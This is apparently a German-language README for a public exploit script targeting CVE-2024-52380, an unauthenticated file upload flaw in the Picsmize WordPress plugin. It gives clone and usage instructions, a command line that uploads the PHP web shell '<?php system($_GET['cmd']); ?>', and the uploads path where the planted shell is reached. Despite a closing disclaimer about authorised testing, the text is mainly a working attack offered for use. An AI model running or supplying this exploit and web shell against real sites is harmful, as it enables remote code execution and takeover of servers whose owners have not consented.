
Das Picsmize-Plugin für WordPress ist anfällig für willkürliche Datei-Uploads.
Das Picsmize-Plugin für WordPress ist anfällig für beliebige Datei-Uploads.
Dieses Skript nutzt eine Sicherheitslücke (CVE-2024-52380) im Picsmize-Plugin für WordPress aus, die es nicht authentifizierten Angreifern ermöglicht, beliebige Dateien hochzuladen. Diese Schwachstelle existiert in allen Versionen von Picsmize bis einschließlich 1.0.0. Die Ausnutzung dieser Schwachstelle kann zu einer Remote-Codeausführung auf dem Zielserver führen.
requests-Bibliothek (pip install requests)git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
Das Skript bietet zwei Befehlszeilenargumente zur einfachen Verwendung:
-u / --url (erforderlich):
-u http://example.com
-c / --content (optional):
<?php phpinfo(); ?>
-c "<?php system($_GET['cmd']); ?>"
/wordpress: Stammverzeichnis der WordPress-Website.wp-content/uploads: Standardverzeichnis für Medien-Uploads in WordPress.2025/01: Die Verzeichnisstruktur entspricht dem Jahr (2025) und Monat (Januar) basierend auf der Datumskonfiguration des Servers.http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php
Dieses Skript ist nur für Bildungszwecke und autorisierte Sicherheitstests gedacht. Die unbefugte Nutzung dieses Tools gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Berechtigung zum Testen haben, ist illegal und unethisch.